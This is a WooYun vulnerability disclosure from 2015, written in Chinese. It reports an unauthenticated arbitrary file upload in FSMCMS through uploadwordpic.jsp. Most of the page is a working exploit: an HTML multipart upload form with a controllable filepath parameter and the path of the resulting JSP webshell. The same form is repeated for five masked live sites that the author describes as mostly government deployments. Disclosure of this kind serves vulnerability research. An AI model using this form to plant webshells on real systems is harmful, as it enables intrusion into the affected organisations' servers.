当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0144292

漏洞标题:FSMCMS系统任意文件上传漏洞

相关厂商:FSMCMS

漏洞作者: 路人甲

提交时间:2015-10-10 14:29

修复时间:2015-11-24 14:30

公开时间:2015-11-24 14:30

漏洞类型:文件上传导致任意代码执行

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-10: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-11-24: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

RT

详细说明:

北京东方文辉信息技术有限公司
官网地址:http://**.**.**.**
版本:通杀
无需登录等认证
大量政府案例:
uploadwordpic.jsp文件上传:
exp:

<FORM name=form1 method=post action="http://**.**.**.**/cms/fileupload/uploadwordpic.jsp?AddWebInfoTID=111111&AddWebColumnID=2222&filepath=/app/" enctype=multipart/form-data>
up:<input type="file" name="Filedata" size="30">
<INPUT type=submit value=上传 name=Submit>
shell:http://**.**.**.**/app/jspx.jspx
/app路径可自定义


案例1:
<FORM name=form1 method=post action="http://**.**.**.**/cms/fileupload/uploadwordpic.jsp?AddWebInfoTID=111111&AddWebColumnID=2222&filepath=/app/" enctype=multipart/form-data>
up:<input type="file" name="Filedata" size="30">
<INPUT type=submit value=上传 name=Submit>
shell:http://**.**.**.**/app/jspx.jspx


uploadwordpic.jsp上传-案例1.png


案例2:
<FORM name=form1 method=post action="http://**.**.**.**:8088/nlw/cms/fileupload/uploadwordpic.jsp?AddWebInfoTID=111111&AddWebColumnID=2222&filepath=/app/" enctype=multipart/form-data>
up:<input type="file" name="Filedata" size="30">
<INPUT type=submit value=上传 name=Submit>
shell:http://**.**.**.**:8088/nlw/app/jspx.jspx


uploadwordpic.jsp上传-案例2.png


案例3:
<FORM name=form1 method=post action="http://**.**.**.**/cms/fileupload/uploadwordpic.jsp?AddWebInfoTID=111111&AddWebColumnID=2222&filepath=/app/" enctype=multipart/form-data>
up:<input type="file" name="Filedata" size="30">
<INPUT type=submit value=上传 name=Submit>
shell: http://**.**.**.**/app/jspx.jspx


uploadwordpic.jsp上传-案例3.png


案例4:
<FORM name=form1 method=post action="http://**.**.**.**/cms/fileupload/uploadwordpic.jsp?AddWebInfoTID=111111&AddWebColumnID=2222&filepath=/app/" enctype=multipart/form-data>
up:<input type="file" name="Filedata" size="30">
<INPUT type=submit value=上传 name=Submit>
shell:http://**.**.**.**/app/jspx.jspx


uploadwordpic.jsp上传-案例4.png


案例5:
<FORM name=form1 method=post action="http://**.**.**.**/fsm/cms/fileupload/uploadwordpic.jsp?AddWebInfoTID=111111&AddWebColumnID=2222&filepath=/app/" enctype=multipart/form-data>
up:<input type="file" name="Filedata" size="30">
<INPUT type=submit value=上传 name=Submit>
shell:http://**.**.**.**/fsm/app/jspx.jspx


uploadwordpic.jsp上传-案例5.png

漏洞证明:

如上

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝


漏洞评价:

评价